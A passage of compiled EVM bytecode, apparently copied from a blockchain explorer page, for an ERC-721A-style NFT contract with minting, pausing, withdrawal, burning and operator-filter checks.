30152614e9181614e55565b9050919050565b600081519050919050565b600082825260208201905092915050565b6000614ebf82614e98565b614ec98185614ea3565b9350614ed9818560208601613f54565b614ee281613f87565b840191505092915050565b6000608082019050614f026000830187614088565b614f0f6020830186614088565b614f1c604083018561411e565b8181036060830152614f2e8184614eb4565b905095945050505050565b600081519050614f4881613e50565b92915050565b600060208284031215614f6457614f63613e1a565b5b6000614f7284828501614f39565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000614fb582613ff3565b9150614fc083613ff3565b925082614fd057614fcf614f7b565b5b828204905092915050565b6000614fe682613ff3565b9150614ff183613ff3565b92508282101561500457615003614850565b5b828203905092915050565b600061501a82613ff3565b915061502583613ff3565b92508261503557615034614f7b565b5b82820690509291505056fea26469706673582212207e98bef7e1c47696e253a88613f9db6832cf8aee5f244d686bc34ffcaac7f41664736f6c634300080d0033697066733a2f2f516d5a665974697a7545754577376e4a327752444a45727653395547626e6a374161427a4744623677666e39466f2f

Deployed Bytecode

0x6080604052600436106102305760003560e01c8063715018a61161012e578063b88d4fde116100ab578063db4a0f611161006f578063db4a0f61146107f2578063e8a3d4851461081b578063e985e9c514610846578063f2fde38b14610883578063f43a22dc146108ac57610230565b8063b88d4fde1461070d578063c668286214610736578063c87b56dd14610761578063cd7c03261461079e578063d476de1b146107c957610230565b806395d89b41116100f257806395d89b41146106495780639fb17e3414610674578063a035b1fe14610690578063a22cb465146106bb578063b80f55c9146106e457610230565b8063715018a61461058a5780637e0c7fc5146105a15780638a333b50146105ca5780638da5cb5b146105f5578063938e3d7b1461062057610230565b80632aa80807116101bc57806357ea89b61161018057806357ea89b6146104a35780635c975abb146104ba5780636352211e146104e55780636c0360eb1461052257806370a082311461054d57610230565b80632aa80807146103d457806342842e0e146103fd578063463fff79146104265780635312e5cf1461045157806355f804b31461047a57610230565b8063095ea7b311610203578063095ea7b31461030357806318160ddd1461032c57806318e223dd1461035757806323b872dd1461038057806326e987d7146103a957610230565b806301ffc9a71461023557806302329a291461027257806306fdde031461029b578063081812fc146102c6575b600080fd5b34801561024157600080fd5b5061025c60048036038101906102579190613e7c565b6108d7565b6040516102699190613ec4565b60405180910390f35b34801561027e57600080fd5b5061029960048036038101906102949190613f0b565b6109b9565b005b3480156102a757600080fd5b506102b0610ab1565b6040516102bd9190613fd1565b60405180910390f35b3480156102d257600080fd5b506102ed60048036038101906102e89190614029565b610b43565b6040516102fa9190614097565b60405180910390f35b34801561030f57600080fd5b5061032a600480360381019061032591906140de565b610bbf565b005b34801561033857600080fd5b50610341610cc9565b60405161034e919061412d565b60405180910390f35b34801561036357600080fd5b5061037e60048036038101906103799190614029565b610ce0565b005b34801561038c57600080fd5b506103a760048036038101906103a29190614148565b610dc5565b005b3480156103b557600080fd5b506103be610fa7565b6040516103cb919061412d565b60405180910390f35b3480156103e057600080fd5b506103fb60048036038101906103f691906142d0565b610fad565b005b34801561040957600080fd5b50610424600480360381019061041f9190614148565b6110a2565b005b34801561043257600080fd5b5061043b6112a4565b604051610448919061412d565b60405180910390f35b34801561045d57600080fd5b5061047860048036038101906104739190614029565b6112aa565b005b34801561048657600080fd5b506104a1600480360381019061049c91906142d0565b61138f565b005b3480156104af57600080fd5b506104b8611484565b005b3480156104c657600080fd5b506104cf61161b565b6040516104dc9190613ec4565b60405180910390f35b3480156104f157600080fd5b5061050c60048036038101906105079190614029565b61162e565b6040516105199190614097565b60405180910390f35b34801561052e57600080fd5b50610537611644565b6040516105449190613fd1565b60405180910390f35b34801561055957600080fd5b50610574600480360381019061056f9190614319565b6116d2565b604051610581919061412d565b60405180910390f35b34801561059657600080fd5b5061059f6117a1565b005b3480156105ad57600080fd5b506105c860048036038101906105c39190614029565b611829565b005b3480156105d657600080fd5b506105df611918565b6040516105ec919061412d565b60405180910390f35b34801561060157600080fd5b5061060a61191e565b6040516106179190614097565b60405180910390f35b34801561062c57600080fd5b50610647600480360381019061064291906142d0565b611948565b005b34801561065557600080fd5b5061065e611a3d565b60405161066b9190613fd1565b60405180910390f35b61068e60048036038101906106899190614029565b611acf565b005b34801561069c57600080fd5b506106a5611d73565b6040516106b2919061412d565b60405180910390f35b3480156106c757600080fd5b506106e260048036038101906106dd9190614346565b611d79565b005b3480156106f057600080fd5b5061070b6004803603810190610706919061444e565b611ef0565b005b34801561071957600080fd5b50610734600480360381019061072f9190614538565b61201d565b005b34801561074257600080fd5b5061074b6122d6565b6040516107589190613fd1565b60405180910390f35b34801561076d57600080fd5b5061078860048036038101906107839190614029565b612364565b6040516107959190613fd1565b60405180910390f35b3480156107aa57600080fd5b506107b361240f565b6040516107c09190614097565b60405180910390f35b3480156107d557600080fd5b506107f060048036038101906107eb9190614029565b612427565b005b3480156107fe57600080fd5b5061081960048036038101906108149190614029565b61250c565b005b34801561082757600080fd5b506108306125f1565b60405161083d9190613fd1565b60405180910390f35b34801561085257600080fd5b5061086d600480360381019061086891906145bb565b61267f565b60405161087a9190613ec4565b60405180910390f35b34801561088f57600080fd5b506108aa60048036038101906108a59190614319565b612763565b005b3480156108b857600080fd5b506108c161285a565b6040516108ce919061412d565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806109a257507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806109b257506109b18261285f565b5b9050919050565b6109c16128c9565b73ffffffffffffffffffffffffffffffffffffffff166109df61191e565b73ffffffffffffffffffffffffffffffffffffffff161480610a555750610a046128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610a94576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8b90614647565b60405180910390fd5b80601160006101000a81548160ff02191690831515021790555050565b606060028054610ac090614696565b80601f0160208091040260200160405190810160405280929190818152602001828054610aec90614696565b8015610b395780601f10610b0e57610100808354040283529160200191610b39565b820191906000526020600020905b815481529060010190602001808311610b1c57829003601f168201915b5050505050905090565b6000610b4e826128d1565b610b84576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610bca8261162e565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c31576040517f943f7b8c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c506128c9565b73ffffffffffffffffffffffffffffffffffffffff1614158015610c825750610c8081610c7b6128c9565b61267f565b155b15610cb9576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610cc483838361291f565b505050565b6000610cd36129d1565b6001546000540303905090565b610ce86128c9565b73ffffffffffffffffffffffffffffffffffffffff16610d0661191e565b73ffffffffffffffffffffffffffffffffffffffff161480610d7c5750610d2b6128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610dbb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db290614647565b60405180910390fd5b80600f8190555050565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610f95573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e3757610e328484846129d6565b610fa1565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610e809291906146c7565b602060405180830381865afa158015610e9d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ec19190614705565b8015610f5357506daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610f119291906146c7565b602060405180830381865afa158015610f2e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610f529190614705565b5b610f9457336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610f8b9190614097565b60405180910390fd5b5b610fa08484846129d6565b5b50505050565b600e5481565b610fb56128c9565b73ffffffffffffffffffffffffffffffffffffffff16610fd361191e565b73ffffffffffffffffffffffffffffffffffffffff1614806110495750610ff86128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611088576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107f90614647565b60405180910390fd5b80600c908051906020019061109e929190613d2a565b5050565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115611282573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036111245761111f8484846040518060200160405280600081525061201d565b61129e565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161116d9291906146c7565b602060405180830381865afa15801561118a573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111ae9190614705565b801561124057506daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016111fe9291906146c7565b602060405180830381865afa15801561121b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061123f9190614705565b5b61128157336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016112789190614097565b60405180910390fd5b5b61129d8484846040518060200160405280600081525061201d565b5b50505050565b600d5481565b6112b26128c9565b73ffffffffffffffffffffffffffffffffffffffff166112d061191e565b73ffffffffffffffffffffffffffffffffffffffff16148061134657506112f56128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611385576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137c90614647565b60405180910390fd5b80600d8190555050565b6113976128c9565b73ffffffffffffffffffffffffffffffffffffffff166113b561191e565b73ffffffffffffffffffffffffffffffffffffffff16148061142b57506113da6128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61146a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161146190614647565b60405180910390fd5b80600a9080519060200190611480929190613d2a565b5050565b61148c6128c9565b73ffffffffffffffffffffffffffffffffffffffff166114aa61191e565b73ffffffffffffffffffffffffffffffffffffffff16148061152057506114cf6128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61155f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161155690614647565b60405180910390fd5b6000479050600061156e6128c9565b73ffffffffffffffffffffffffffffffffffffffff168260405161159190614763565b60006040518083038185875af1925050503d80600081146115ce576040519150601f19603f3d011682016040523d82523d6000602084013e6115d3565b606091505b5050905080611617576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160e906147c4565b60405180910390fd5b5050565b601160009054906101000a900460ff1681565b600061163982612ec5565b600001519050919050565b600a805461165190614696565b80601f016020809104026020016040519081016040528092919081815260200182805461167d90614696565b80156116ca5780601f1061169f576101008083540402835291602001916116ca565b820191906000526020600020905b8154815290600101906020018083116116ad57829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611739576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a900467ffffffffffffffff1667ffffffffffffffff169050919050565b6117a96128c9565b73ffffffffffffffffffffffffffffffffffffffff166117c761191e565b73ffffffffffffffffffffffffffffffffffffffff161461181d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161181490614647565b60405180910390fd5b6118276000613154565b565b6118316128c9565b73ffffffffffffffffffffffffffffffffffffffff1661184f61191e565b73ffffffffffffffffffffffffffffffffffffffff1614806118c557506118746128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611904576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118fb90614647565b60405180910390fd5b61191561190f6128c9565b8261321a565b50565b600f5481565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6119506128c9565b73ffffffffffffffffffffffffffffffffffffffff1661196e61191e565b73ffffffffffffffffffffffffffffffffffffffff1614806119e457506119936128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611a23576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a1a90614647565b60405180910390fd5b80600b9080519060200190611a39929190613d2a565b5050565b606060038054611a4c90614696565b80601f0160208091040260200160405190810160405280929190818152602001828054611a7890614696565b8015611ac55780601f10611a9a57610100808354040283529160200191611ac5565b820191906000526020600020905b815481529060010190602001808311611aa857829003601f168201915b5050505050905090565b6000611ad96128c9565b9050601160009054906101000a900460ff1615611b2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b2290614830565b60405180910390fd5b81611b34610cc9565b611b3e919061487f565b600f541015611b82576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b7990614921565b60405180910390fd5b60008211611bc5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bbc9061498d565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff1614611c33576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c2a906149f9565b60405180910390fd5b81600a1015611c77576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c6e90614a65565b60405180910390fd5b611c7f610cc9565b600e5410611cd15781600d541015611ccc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cc390614ad1565b60405180910390fd5b611d65565b81600a1015611d15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d0c90614a65565b60405180910390fd5b3460105483611d249190614af1565b14611d64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d5b90614b97565b60405180910390fd5b5b611d6f818361321a565b5050565b60105481565b611d816128c9565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611de5576040517fb06307db00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060076000611df26128c9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611e9f6128c9565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611ee49190613ec4565b60405180910390a35050565b611ef86128c9565b73ffffffffffffffffffffffffffffffffffffffff16611f1661191e565b73ffffffffffffffffffffffffffffffffffffffff161480611f8c5750611f3b6128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611fcb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fc290614647565b60405180910390fd5b60008151905060005b81811015612018576000838281518110611ff157611ff0614bb7565b5b6020026020010151905061200481613238565b50808061201090614be6565b915050611fd4565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115612258573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036120fa5761208a8585856129d6565b6120a98473ffffffffffffffffffffffffffffffffffffffff166135db565b80156120be57506120bc858585856135fe565b155b156120f5576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6122cf565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016121439291906146c7565b602060405180830381865afa158015612160573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906121849190614705565b801561221657506daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016121d49291906146c7565b602060405180830381865afa1580156121f1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906122159190614705565b5b61225757336040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161224e9190614097565b60405180910390fd5b5b6122638585856129d6565b6122828473ffffffffffffffffffffffffffffffffffffffff166135db565b80156122975750612295858585856135fe565b155b156122ce576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b5050505050565b600c80546122e390614696565b80601f016020809104026020016040519081016040528092919081815260200182805461230f90614696565b801561235c5780601f106123315761010080835404028352916020019161235c565b820191906000526020600020905b81548152906001019060200180831161233f57829003601f168201915b505050505081565b606061236f826128d1565b6123ae576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123a590614c7a565b60405180910390fd5b6000600a80546123bd90614696565b9050116123d95760405180602001604052806000815250612408565b600a6123e48361374e565b600c6040516020016123f893929190614d6a565b6040516020818303038152906040525b9050919050565b73a5409ec958c83c3f309868babaca7c86dcb077c181565b61242f6128c9565b73ffffffffffffffffffffffffffffffffffffffff1661244d61191e565b73ffffffffffffffffffffffffffffffffffffffff1614806124c357506124726128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b612502576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124f990614647565b60405180910390fd5b80600e8190555050565b6125146128c9565b73ffffffffffffffffffffffffffffffffffffffff1661253261191e565b73ffffffffffffffffffffffffffffffffffffffff1614806125a857506125576128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6125e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125de90614647565b60405180910390fd5b8060108190555050565b600b80546125fe90614696565b80601f016020809104026020016040519081016040528092919081815260200182805461262a90614696565b80156126775780601f1061264c57610100808354040283529160200191612677565b820191906000526020600020905b81548152906001019060200180831161265a57829003601f168201915b505050505081565b60008073a5409ec958c83c3f309868babaca7c86dcb077c190508273ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1663c4552791866040518263ffffffff1660e01b81526004016126e99190614097565b602060405180830381865afa158015612706573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061272a9190614dd9565b73ffffffffffffffffffffffffffffffffffffffff160361274f57600191505061275d565b61275984846138ae565b9150505b92915050565b61276b6128c9565b73ffffffffffffffffffffffffffffffffffffffff1661278961191e565b73ffffffffffffffffffffffffffffffffffffffff16146127df576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127d690614647565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361284e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161284590614e78565b60405180910390fd5b61285781613154565b50565b600a81565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b600033905090565b6000816128dc6129d1565b111580156128eb575060005482105b8015612918575060046000838152602001908152602001600020600001601c9054906101000a900460ff16155b9050919050565b826006600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b60006129e182612ec5565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff16612a086128c9565b73ffffffffffffffffffffffffffffffffffffffff161480612a3b5750612a3a8260000151612a356128c9565b61267f565b5b80612a805750612a496128c9565b73ffffffffffffffffffffffffffffffffffffffff16612a6884610b43565b73ffffffffffffffffffffffffffffffffffffffff16145b905080612ab9576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff1614612b22576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603612b88576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b612b958585856001613942565b612ba5600084846000015161291f565b6001600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160392506101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506001600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550836004600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426004600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166004600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603612e5557600054811015612e545782600001516004600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516004600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4612ebe8585856001613948565b5050505050565b612ecd613db0565b600082905080612edb6129d1565b11158015612eea575060005481105b1561311d576000600460008381526020019081526020016000206040518060600160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815260200160008201601c9054906101000a900460ff1615151515815250509050806040015161311b57600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614612fff57809250505061314f565b5b60011561311a57818060019003925050600460008381526020019081526020016000206040518060600160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815260200160008201601c9054906101000a900460ff1615151515815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff161461311557809250505061314f565b613000565b5b505b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b61323482826040518060200160405280600081525061394e565b5050565b600061324382612ec5565b905061325781600001516000846001613942565b613267600083836000015161291f565b600160056000836000015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160392506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600160056000836000015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff16021790555080600001516004600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426004600084815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600160046000848152602001908152602001600020600001601c6101000a81548160ff0219169083151502179055506000600183019050600073ffffffffffffffffffffffffffffffffffffffff166004600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603613552576000548110156135515781600001516004600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555081602001516004600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b5081600073ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46135c581600001516000846001613948565b6001600081548092919060010191905055505050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a026136246128c9565b8786866040518563ffffffff1660e01b81526004016136469493929190614eed565b6020604051808303816000875af192505050801561368257506040513d601f19601f8201168201806040525081019061367f9190614f4e565b60015b6136fb573d80600081146136b2576040519150601f19603f3d011682016040523d82523d6000602084013e6136b7565b606091505b5060008151036136f3576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b606060008203613795576040518060400160405280600181526020017f300000000000000000000000000000000000000000000000000000000000000081525090506138a9565b600082905060005b600082146137c75780806137b090614be6565b915050600a826137c09190614faa565b915061379d565b60008167ffffffffffffffff8111156137e3576137e26141a5565b5b6040519080825280601f01601f1916602001820160405280156138155781602001600182028036833780820191505090505b5090505b600085146138a25760018261382e9190614fdb565b9150600a8561383d919061500f565b6030613849919061487f565b60f81b81838151811061385f5761385e614bb7565b5b60200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350600a8561389b9190614faa565b9450613819565b8093505050505b919050565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b50505050565b50505050565b61395b8383836001613960565b505050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16036139cc576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008403613a06576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b613a136000868387613942565b83600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff16021790555083600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160088282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550846004600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426004600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600081905060008582019050838015613bdd5750613bdc8773ffffffffffffffffffffffffffffffffffffffff166135db565b5b15613ca2575b818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4613c5260008884806001019550886135fe565b613c88576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b808203613be3578260005414613c9d57600080fd5b613d0d565b5b818060010192508773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4808203613ca3575b816000819055505050613d236000868387613948565b5050505050565b828054613d3690614696565b90600052602060002090601f016020900481019282613d585760008555613d9f565b82601f10613d7157805160ff1916838001178555613d9f565b82800160010185558215613d9f579182015b82811115613d9e578251825591602001919060010190613d83565b5b509050613dac9190613df3565b5090565b6040518060600160405280600073ffffffffffffffffffffffffffffffffffffffff168152602001600067ffffffffffffffff1681526020016000151581525090565b5b80821115613e0c576000816000905550600101613df4565b5090565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b613e5981613e24565b8114613e6457600080fd5b50565b60008